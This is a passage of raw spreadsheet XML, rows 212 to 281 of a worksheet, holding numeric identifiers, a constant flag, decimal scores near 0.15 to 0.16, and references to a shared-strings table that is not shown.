      <c r="A212" s="1">
        <v>3681.0</v>
      </c>
      <c r="B212" s="2">
        <v>3.9464039E7</v>
      </c>
      <c r="C212" s="2" t="s">
        <v>182</v>
      </c>
      <c r="D212" s="2">
        <v>1.0</v>
      </c>
      <c r="E212" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F212" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="213" ht="15.75" customHeight="1">
      <c r="A213" s="1">
        <v>17559.0</v>
      </c>
      <c r="B213" s="2">
        <v>5.022319E7</v>
      </c>
      <c r="C213" s="2" t="s">
        <v>183</v>
      </c>
      <c r="D213" s="2">
        <v>1.0</v>
      </c>
      <c r="E213" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F213" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="214" ht="15.75" customHeight="1">
      <c r="A214" s="1">
        <v>26978.0</v>
      </c>
      <c r="B214" s="2">
        <v>1.9714446E7</v>
      </c>
      <c r="C214" s="2" t="s">
        <v>179</v>
      </c>
      <c r="D214" s="2">
        <v>1.0</v>
      </c>
      <c r="E214" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F214" s="2">
        <v>0.1608187134502924</v>
      </c>
    </row>
    <row r="215" ht="15.75" customHeight="1">
      <c r="A215" s="1">
        <v>6867.0</v>
      </c>
      <c r="B215" s="2">
        <v>4.9682879E7</v>
      </c>
      <c r="C215" s="2" t="s">
        <v>184</v>
      </c>
      <c r="D215" s="2">
        <v>1.0</v>
      </c>
      <c r="E215" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F215" s="2">
        <v>0.160569105691057</v>
      </c>
    </row>
    <row r="216" ht="15.75" customHeight="1">
      <c r="A216" s="1">
        <v>28958.0</v>
      </c>
      <c r="B216" s="2">
        <v>2.9784629E7</v>
      </c>
      <c r="C216" s="2" t="s">
        <v>185</v>
      </c>
      <c r="D216" s="2">
        <v>1.0</v>
      </c>
      <c r="E216" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F216" s="2">
        <v>0.160394265232975</v>
      </c>
    </row>
    <row r="217" ht="15.75" customHeight="1">
      <c r="A217" s="1">
        <v>29339.0</v>
      </c>
      <c r="B217" s="2">
        <v>3.1386743E7</v>
      </c>
      <c r="C217" s="2" t="s">
        <v>186</v>
      </c>
      <c r="D217" s="2">
        <v>1.0</v>
      </c>
      <c r="E217" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F217" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="218" ht="15.75" customHeight="1">
      <c r="A218" s="1">
        <v>29741.0</v>
      </c>
      <c r="B218" s="2">
        <v>3.4656878E7</v>
      </c>
      <c r="C218" s="2" t="s">
        <v>187</v>
      </c>
      <c r="D218" s="2">
        <v>1.0</v>
      </c>
      <c r="E218" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F218" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="219" ht="15.75" customHeight="1">
      <c r="A219" s="1">
        <v>32445.0</v>
      </c>
      <c r="B219" s="2">
        <v>5669241.0</v>
      </c>
      <c r="C219" s="2" t="s">
        <v>188</v>
      </c>
      <c r="D219" s="2">
        <v>1.0</v>
      </c>
      <c r="E219" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F219" s="2">
        <v>0.1601851851851852</v>
      </c>
    </row>
    <row r="220" ht="15.75" customHeight="1">
      <c r="A220" s="1">
        <v>30755.0</v>
      </c>
      <c r="B220" s="2">
        <v>4.4173153E7</v>
      </c>
      <c r="C220" s="2" t="s">
        <v>189</v>
      </c>
      <c r="D220" s="2">
        <v>1.0</v>
      </c>
      <c r="E220" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F220" s="2">
        <v>0.1599616858237548</v>
      </c>
    </row>
    <row r="221" ht="15.75" customHeight="1">
      <c r="A221" s="1">
        <v>26404.0</v>
      </c>
      <c r="B221" s="2">
        <v>1.7069591E7</v>
      </c>
      <c r="C221" s="2" t="s">
        <v>190</v>
      </c>
      <c r="D221" s="2">
        <v>1.0</v>
      </c>
      <c r="E221" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F221" s="2">
        <v>0.1598290598290598</v>
      </c>
    </row>
    <row r="222" ht="15.75" customHeight="1">
      <c r="A222" s="1">
        <v>28472.0</v>
      </c>
      <c r="B222" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C222" s="2" t="s">
        <v>191</v>
      </c>
      <c r="D222" s="2">
        <v>1.0</v>
      </c>
      <c r="E222" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F222" s="2">
        <v>0.1597222222222222</v>
      </c>
    </row>
    <row r="223" ht="15.75" customHeight="1">
      <c r="A223" s="1">
        <v>20247.0</v>
      </c>
      <c r="B223" s="2">
        <v>1.0941775E7</v>
      </c>
      <c r="C223" s="2" t="s">
        <v>192</v>
      </c>
      <c r="D223" s="2">
        <v>1.0</v>
      </c>
      <c r="E223" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F223" s="2">
        <v>0.1596119929453263</v>
      </c>
    </row>
    <row r="224" ht="15.75" customHeight="1">
      <c r="A224" s="1">
        <v>26356.0</v>
      </c>
      <c r="B224" s="2">
        <v>1.6829778E7</v>
      </c>
      <c r="C224" s="2" t="s">
        <v>193</v>
      </c>
      <c r="D224" s="2">
        <v>1.0</v>
      </c>
      <c r="E224" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F224" s="2">
        <v>0.1593806921675775</v>
      </c>
    </row>
    <row r="225" ht="15.75" customHeight="1">
      <c r="A225" s="1">
        <v>24989.0</v>
      </c>
      <c r="B225" s="2">
        <v>1.2686108E7</v>
      </c>
      <c r="C225" s="2" t="s">
        <v>194</v>
      </c>
      <c r="D225" s="2">
        <v>1.0</v>
      </c>
      <c r="E225" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F225" s="2">
        <v>0.1591337099811676</v>
      </c>
    </row>
    <row r="226" ht="15.75" customHeight="1">
      <c r="A226" s="1">
        <v>28110.0</v>
      </c>
      <c r="B226" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C226" s="2" t="s">
        <v>195</v>
      </c>
      <c r="D226" s="2">
        <v>1.0</v>
      </c>
      <c r="E226" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F226" s="2">
        <v>0.158869395711501</v>
      </c>
    </row>
    <row r="227" ht="15.75" customHeight="1">
      <c r="A227" s="1">
        <v>22410.0</v>
      </c>
      <c r="B227" s="2">
        <v>3.5840311E7</v>
      </c>
      <c r="C227" s="2" t="s">
        <v>196</v>
      </c>
      <c r="D227" s="2">
        <v>1.0</v>
      </c>
      <c r="E227" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F227" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="228" ht="15.75" customHeight="1">
      <c r="A228" s="1">
        <v>25257.0</v>
      </c>
      <c r="B228" s="2">
        <v>1.3382816E7</v>
      </c>
      <c r="C228" s="2" t="s">
        <v>197</v>
      </c>
      <c r="D228" s="2">
        <v>1.0</v>
      </c>
      <c r="E228" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F228" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="229" ht="15.75" customHeight="1">
      <c r="A229" s="1">
        <v>27743.0</v>
      </c>
      <c r="B229" s="2">
        <v>2.3081482E7</v>
      </c>
      <c r="C229" s="2" t="s">
        <v>198</v>
      </c>
      <c r="D229" s="2">
        <v>1.0</v>
      </c>
      <c r="E229" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F229" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="230" ht="15.75" customHeight="1">
      <c r="A230" s="1">
        <v>32697.0</v>
      </c>
      <c r="B230" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C230" s="2" t="s">
        <v>199</v>
      </c>
      <c r="D230" s="2">
        <v>1.0</v>
      </c>
      <c r="E230" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F230" s="2">
        <v>0.1588541666666667</v>
      </c>
    </row>
    <row r="231" ht="15.75" customHeight="1">
      <c r="A231" s="1">
        <v>10119.0</v>
      </c>
      <c r="B231" s="2">
        <v>5.7253575E7</v>
      </c>
      <c r="C231" s="2" t="s">
        <v>200</v>
      </c>
      <c r="D231" s="2">
        <v>1.0</v>
      </c>
      <c r="E231" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F231" s="2">
        <v>0.1588319088319089</v>
      </c>
    </row>
    <row r="232" ht="15.75" customHeight="1">
      <c r="A232" s="1">
        <v>20741.0</v>
      </c>
      <c r="B232" s="2">
        <v>1.4769432E7</v>
      </c>
      <c r="C232" s="2" t="s">
        <v>148</v>
      </c>
      <c r="D232" s="2">
        <v>1.0</v>
      </c>
      <c r="E232" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F232" s="2">
        <v>0.1586021505376344</v>
      </c>
    </row>
    <row r="233" ht="15.75" customHeight="1">
      <c r="A233" s="1">
        <v>18326.0</v>
      </c>
      <c r="B233" s="2">
        <v>5.2407775E7</v>
      </c>
      <c r="C233" s="2" t="s">
        <v>201</v>
      </c>
      <c r="D233" s="2">
        <v>1.0</v>
      </c>
      <c r="E233" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F233" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="234" ht="15.75" customHeight="1">
      <c r="A234" s="1">
        <v>25027.0</v>
      </c>
      <c r="B234" s="2">
        <v>1.2824565E7</v>
      </c>
      <c r="C234" s="2" t="s">
        <v>202</v>
      </c>
      <c r="D234" s="2">
        <v>1.0</v>
      </c>
      <c r="E234" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F234" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="235" ht="15.75" customHeight="1">
      <c r="A235" s="1">
        <v>26720.0</v>
      </c>
      <c r="B235" s="2">
        <v>1.8233062E7</v>
      </c>
      <c r="C235" s="2" t="s">
        <v>203</v>
      </c>
      <c r="D235" s="2">
        <v>1.0</v>
      </c>
      <c r="E235" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F235" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="236" ht="15.75" customHeight="1">
      <c r="A236" s="1">
        <v>28465.0</v>
      </c>
      <c r="B236" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C236" s="2" t="s">
        <v>204</v>
      </c>
      <c r="D236" s="2">
        <v>1.0</v>
      </c>
      <c r="E236" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F236" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="237" ht="15.75" customHeight="1">
      <c r="A237" s="1">
        <v>30879.0</v>
      </c>
      <c r="B237" s="2">
        <v>4.6311086E7</v>
      </c>
      <c r="C237" s="2" t="s">
        <v>205</v>
      </c>
      <c r="D237" s="2">
        <v>1.0</v>
      </c>
      <c r="E237" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F237" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="238" ht="15.75" customHeight="1">
      <c r="A238" s="1">
        <v>31172.0</v>
      </c>
      <c r="B238" s="2">
        <v>4.9124169E7</v>
      </c>
      <c r="C238" s="2" t="s">
        <v>206</v>
      </c>
      <c r="D238" s="2">
        <v>1.0</v>
      </c>
      <c r="E238" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F238" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="239" ht="15.75" customHeight="1">
      <c r="A239" s="1">
        <v>34010.0</v>
      </c>
      <c r="B239" s="2">
        <v>9510613.0</v>
      </c>
      <c r="C239" s="2" t="s">
        <v>207</v>
      </c>
      <c r="D239" s="2">
        <v>1.0</v>
      </c>
      <c r="E239" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F239" s="2">
        <v>0.1580459770114943</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1">
      <c r="A240" s="1">
        <v>24872.0</v>
      </c>
      <c r="B240" s="2">
        <v>1.2210675E7</v>
      </c>
      <c r="C240" s="2" t="s">
        <v>208</v>
      </c>
      <c r="D240" s="2">
        <v>1.0</v>
      </c>
      <c r="E240" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F240" s="2">
        <v>0.1575591985428051</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1">
      <c r="A241" s="1">
        <v>25216.0</v>
      </c>
      <c r="B241" s="2">
        <v>1.327305E7</v>
      </c>
      <c r="C241" s="2" t="s">
        <v>209</v>
      </c>
      <c r="D241" s="2">
        <v>1.0</v>
      </c>
      <c r="E241" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F241" s="2">
        <v>0.1575591985428051</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1">
      <c r="A242" s="1">
        <v>26422.0</v>
      </c>
      <c r="B242" s="2">
        <v>1.7154828E7</v>
      </c>
      <c r="C242" s="2" t="s">
        <v>210</v>
      </c>
      <c r="D242" s="2">
        <v>1.0</v>
      </c>
      <c r="E242" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F242" s="2">
        <v>0.1571180555555556</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1">
      <c r="A243" s="1">
        <v>22463.0</v>
      </c>
      <c r="B243" s="2">
        <v>3.6566251E7</v>
      </c>
      <c r="C243" s="2" t="s">
        <v>211</v>
      </c>
      <c r="D243" s="2">
        <v>1.0</v>
      </c>
      <c r="E243" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F243" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1">
      <c r="A244" s="1">
        <v>32443.0</v>
      </c>
      <c r="B244" s="2">
        <v>5.6660255E7</v>
      </c>
      <c r="C244" s="2" t="s">
        <v>212</v>
      </c>
      <c r="D244" s="2">
        <v>1.0</v>
      </c>
      <c r="E244" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F244" s="2">
        <v>0.156810035842294</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1">
      <c r="A245" s="1">
        <v>27647.0</v>
      </c>
      <c r="B245" s="2">
        <v>2.2777732E7</v>
      </c>
      <c r="C245" s="2" t="s">
        <v>213</v>
      </c>
      <c r="D245" s="2">
        <v>1.0</v>
      </c>
      <c r="E245" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F245" s="2">
        <v>0.1568100358422939</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1">
      <c r="A246" s="1">
        <v>5437.0</v>
      </c>
      <c r="B246" s="2">
        <v>4.5592334E7</v>
      </c>
      <c r="C246" s="2" t="s">
        <v>214</v>
      </c>
      <c r="D246" s="2">
        <v>1.0</v>
      </c>
      <c r="E246" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F246" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1">
      <c r="A247" s="1">
        <v>21332.0</v>
      </c>
      <c r="B247" s="2">
        <v>2.1054837E7</v>
      </c>
      <c r="C247" s="2" t="s">
        <v>215</v>
      </c>
      <c r="D247" s="2">
        <v>1.0</v>
      </c>
      <c r="E247" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F247" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1">
      <c r="A248" s="1">
        <v>31258.0</v>
      </c>
      <c r="B248" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C248" s="2" t="s">
        <v>216</v>
      </c>
      <c r="D248" s="2">
        <v>1.0</v>
      </c>
      <c r="E248" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F248" s="2">
        <v>0.1564102564102565</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1">
      <c r="A249" s="1">
        <v>30530.0</v>
      </c>
      <c r="B249" s="2">
        <v>4.0378786E7</v>
      </c>
      <c r="C249" s="2" t="s">
        <v>217</v>
      </c>
      <c r="D249" s="2">
        <v>1.0</v>
      </c>
      <c r="E249" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F249" s="2">
        <v>0.1564102564102564</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1">
      <c r="A250" s="1">
        <v>26331.0</v>
      </c>
      <c r="B250" s="2">
        <v>1.6720064E7</v>
      </c>
      <c r="C250" s="2" t="s">
        <v>218</v>
      </c>
      <c r="D250" s="2">
        <v>1.0</v>
      </c>
      <c r="E250" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F250" s="2">
        <v>0.1563492063492064</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1">
      <c r="A251" s="1">
        <v>28463.0</v>
      </c>
      <c r="B251" s="2">
        <v>2.6615476E7</v>
      </c>
      <c r="C251" s="2" t="s">
        <v>219</v>
      </c>
      <c r="D251" s="2">
        <v>1.0</v>
      </c>
      <c r="E251" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F251" s="2">
        <v>0.1561302681992338</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1">
      <c r="A252" s="1">
        <v>29833.0</v>
      </c>
      <c r="B252" s="2">
        <v>3.5394704E7</v>
      </c>
      <c r="C252" s="2" t="s">
        <v>220</v>
      </c>
      <c r="D252" s="2">
        <v>1.0</v>
      </c>
      <c r="E252" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F252" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1">
      <c r="A253" s="1">
        <v>32446.0</v>
      </c>
      <c r="B253" s="2">
        <v>5669241.0</v>
      </c>
      <c r="C253" s="2" t="s">
        <v>221</v>
      </c>
      <c r="D253" s="2">
        <v>1.0</v>
      </c>
      <c r="E253" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F253" s="2">
        <v>0.1557377049180328</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1">
      <c r="A254" s="1">
        <v>20338.0</v>
      </c>
      <c r="B254" s="2">
        <v>1.1583696E7</v>
      </c>
      <c r="C254" s="2" t="s">
        <v>222</v>
      </c>
      <c r="D254" s="2">
        <v>1.0</v>
      </c>
      <c r="E254" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F254" s="2">
        <v>0.1557239057239057</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1">
      <c r="A255" s="1">
        <v>27177.0</v>
      </c>
      <c r="B255" s="2">
        <v>2.0865714E7</v>
      </c>
      <c r="C255" s="2" t="s">
        <v>223</v>
      </c>
      <c r="D255" s="2">
        <v>1.0</v>
      </c>
      <c r="E255" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F255" s="2">
        <v>0.1557120500782473</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1">
      <c r="A256" s="1">
        <v>20420.0</v>
      </c>
      <c r="B256" s="2">
        <v>1.2302413E7</v>
      </c>
      <c r="C256" s="2" t="s">
        <v>224</v>
      </c>
      <c r="D256" s="2">
        <v>1.0</v>
      </c>
      <c r="E256" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F256" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1">
      <c r="A257" s="1">
        <v>21113.0</v>
      </c>
      <c r="B257" s="2">
        <v>1.8233063E7</v>
      </c>
      <c r="C257" s="2" t="s">
        <v>225</v>
      </c>
      <c r="D257" s="2">
        <v>1.0</v>
      </c>
      <c r="E257" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F257" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1">
      <c r="A258" s="1">
        <v>21114.0</v>
      </c>
      <c r="B258" s="2">
        <v>1.8236816E7</v>
      </c>
      <c r="C258" s="2" t="s">
        <v>226</v>
      </c>
      <c r="D258" s="2">
        <v>1.0</v>
      </c>
      <c r="E258" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F258" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1">
      <c r="A259" s="1">
        <v>23771.0</v>
      </c>
      <c r="B259" s="2">
        <v>7562024.0</v>
      </c>
      <c r="C259" s="2" t="s">
        <v>227</v>
      </c>
      <c r="D259" s="2">
        <v>1.0</v>
      </c>
      <c r="E259" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F259" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1">
      <c r="A260" s="1">
        <v>24912.0</v>
      </c>
      <c r="B260" s="2">
        <v>1.2322121E7</v>
      </c>
      <c r="C260" s="2" t="s">
        <v>228</v>
      </c>
      <c r="D260" s="2">
        <v>1.0</v>
      </c>
      <c r="E260" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F260" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1">
      <c r="A261" s="1">
        <v>26623.0</v>
      </c>
      <c r="B261" s="2">
        <v>1.8043106E7</v>
      </c>
      <c r="C261" s="2" t="s">
        <v>224</v>
      </c>
      <c r="D261" s="2">
        <v>1.0</v>
      </c>
      <c r="E261" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F261" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1">
      <c r="A262" s="1">
        <v>27492.0</v>
      </c>
      <c r="B262" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C262" s="2" t="s">
        <v>229</v>
      </c>
      <c r="D262" s="2">
        <v>1.0</v>
      </c>
      <c r="E262" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F262" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1">
      <c r="A263" s="1">
        <v>28462.0</v>
      </c>
      <c r="B263" s="2">
        <v>2.6612653E7</v>
      </c>
      <c r="C263" s="2" t="s">
        <v>230</v>
      </c>
      <c r="D263" s="2">
        <v>1.0</v>
      </c>
      <c r="E263" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F263" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1">
      <c r="A264" s="1">
        <v>30520.0</v>
      </c>
      <c r="B264" s="2">
        <v>4.0177105E7</v>
      </c>
      <c r="C264" s="2" t="s">
        <v>231</v>
      </c>
      <c r="D264" s="2">
        <v>1.0</v>
      </c>
      <c r="E264" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F264" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1">
      <c r="A265" s="1">
        <v>31491.0</v>
      </c>
      <c r="B265" s="2">
        <v>5062934.0</v>
      </c>
      <c r="C265" s="2" t="s">
        <v>232</v>
      </c>
      <c r="D265" s="2">
        <v>1.0</v>
      </c>
      <c r="E265" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F265" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1">
      <c r="A266" s="1">
        <v>33742.0</v>
      </c>
      <c r="B266" s="2">
        <v>8555883.0</v>
      </c>
      <c r="C266" s="2" t="s">
        <v>228</v>
      </c>
      <c r="D266" s="2">
        <v>1.0</v>
      </c>
      <c r="E266" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F266" s="2">
        <v>0.1553672316384181</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1">
      <c r="A267" s="1">
        <v>22401.0</v>
      </c>
      <c r="B267" s="2">
        <v>3.5696967E7</v>
      </c>
      <c r="C267" s="2" t="s">
        <v>233</v>
      </c>
      <c r="D267" s="2">
        <v>1.0</v>
      </c>
      <c r="E267" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F267" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="268" ht="15.75" customHeight="1">
      <c r="A268" s="1">
        <v>23306.0</v>
      </c>
      <c r="B268" s="2">
        <v>5.4113316E7</v>
      </c>
      <c r="C268" s="2" t="s">
        <v>234</v>
      </c>
      <c r="D268" s="2">
        <v>1.0</v>
      </c>
      <c r="E268" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F268" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="269" ht="15.75" customHeight="1">
      <c r="A269" s="1">
        <v>32180.0</v>
      </c>
      <c r="B269" s="2">
        <v>5.4647162E7</v>
      </c>
      <c r="C269" s="2" t="s">
        <v>235</v>
      </c>
      <c r="D269" s="2">
        <v>1.0</v>
      </c>
      <c r="E269" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F269" s="2">
        <v>0.1547008547008547</v>
      </c>
    </row>
    <row r="270" ht="15.75" customHeight="1">
      <c r="A270" s="1">
        <v>27333.0</v>
      </c>
      <c r="B270" s="2">
        <v>2.1451672E7</v>
      </c>
      <c r="C270" s="2" t="s">
        <v>236</v>
      </c>
      <c r="D270" s="2">
        <v>1.0</v>
      </c>
      <c r="E270" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F270" s="2">
        <v>0.1546296296296297</v>
      </c>
    </row>
    <row r="271" ht="15.75" customHeight="1">
      <c r="A271" s="1">
        <v>33470.0</v>
      </c>
      <c r="B271" s="2">
        <v>7970417.0</v>
      </c>
      <c r="C271" s="2" t="s">
        <v>237</v>
      </c>
      <c r="D271" s="2">
        <v>1.0</v>
      </c>
      <c r="E271" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F271" s="2">
        <v>0.154320987654321</v>
      </c>
    </row>
    <row r="272" ht="15.75" customHeight="1">
      <c r="A272" s="1">
        <v>33600.0</v>
      </c>
      <c r="B272" s="2">
        <v>8339037.0</v>
      </c>
      <c r="C272" s="2" t="s">
        <v>238</v>
      </c>
      <c r="D272" s="2">
        <v>1.0</v>
      </c>
      <c r="E272" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F272" s="2">
        <v>0.1542145593869732</v>
      </c>
    </row>
    <row r="273" ht="15.75" customHeight="1">
      <c r="A273" s="1">
        <v>13730.0</v>
      </c>
      <c r="B273" s="2">
        <v>3.6391518E7</v>
      </c>
      <c r="C273" s="2" t="s">
        <v>239</v>
      </c>
      <c r="D273" s="2">
        <v>1.0</v>
      </c>
      <c r="E273" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F273" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="274" ht="15.75" customHeight="1">
      <c r="A274" s="1">
        <v>31934.0</v>
      </c>
      <c r="B274" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C274" s="2" t="s">
        <v>240</v>
      </c>
      <c r="D274" s="2">
        <v>1.0</v>
      </c>
      <c r="E274" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F274" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="275" ht="15.75" customHeight="1">
      <c r="A275" s="1">
        <v>21959.0</v>
      </c>
      <c r="B275" s="2">
        <v>2.9019475E7</v>
      </c>
      <c r="C275" s="2" t="s">
        <v>241</v>
      </c>
      <c r="D275" s="2">
        <v>1.0</v>
      </c>
      <c r="E275" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F275" s="2">
        <v>0.1539162112932605</v>
      </c>
    </row>
    <row r="276" ht="15.75" customHeight="1">
      <c r="A276" s="1">
        <v>21190.0</v>
      </c>
      <c r="B276" s="2">
        <v>1.9319754E7</v>
      </c>
      <c r="C276" s="2" t="s">
        <v>242</v>
      </c>
      <c r="D276" s="2">
        <v>1.0</v>
      </c>
      <c r="E276" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F276" s="2">
        <v>0.1537698412698413</v>
      </c>
    </row>
    <row r="277" ht="15.75" customHeight="1">
      <c r="A277" s="1">
        <v>20624.0</v>
      </c>
      <c r="B277" s="2">
        <v>1.4062623E7</v>
      </c>
      <c r="C277" s="2" t="s">
        <v>243</v>
      </c>
      <c r="D277" s="2">
        <v>1.0</v>
      </c>
      <c r="E277" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F277" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="278" ht="15.75" customHeight="1">
      <c r="A278" s="1">
        <v>21083.0</v>
      </c>
      <c r="B278" s="2">
        <v>1.8043107E7</v>
      </c>
      <c r="C278" s="2" t="s">
        <v>224</v>
      </c>
      <c r="D278" s="2">
        <v>1.0</v>
      </c>
      <c r="E278" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F278" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="279" ht="15.75" customHeight="1">
      <c r="A279" s="1">
        <v>23320.0</v>
      </c>
      <c r="B279" s="2">
        <v>5.4355646E7</v>
      </c>
      <c r="C279" s="2" t="s">
        <v>244</v>
      </c>
      <c r="D279" s="2">
        <v>1.0</v>
      </c>
      <c r="E279" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F279" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="280" ht="15.75" customHeight="1">
      <c r="A280" s="1">
        <v>25596.0</v>
      </c>
      <c r="B280" s="2">
        <v>1.4377581E7</v>
      </c>
      <c r="C280" s="2" t="s">
        <v>245</v>
      </c>
      <c r="D280" s="2">
        <v>1.0</v>
      </c>
      <c r="E280" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F280" s="2">
        <v>0.1534839924670434</v>
      </c>
    </row>
    <row r="281" ht="15.75" customHeight="1">
      <c r="A281" s="1">
        <v>29539.0</v>
      </c>
      <c r="B281" s="2">
        <v>3.283781E7</v>
      </c>
      <c r="C281" s="2" t="s">
        <v>246</v>
      </c>
      <c r="D281" s="2">
        <v>1.0</v>
      </c>
      <c r="E281" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F281" s="2">
        <v>0.1534839924670433</v>
      </c>
    </row>
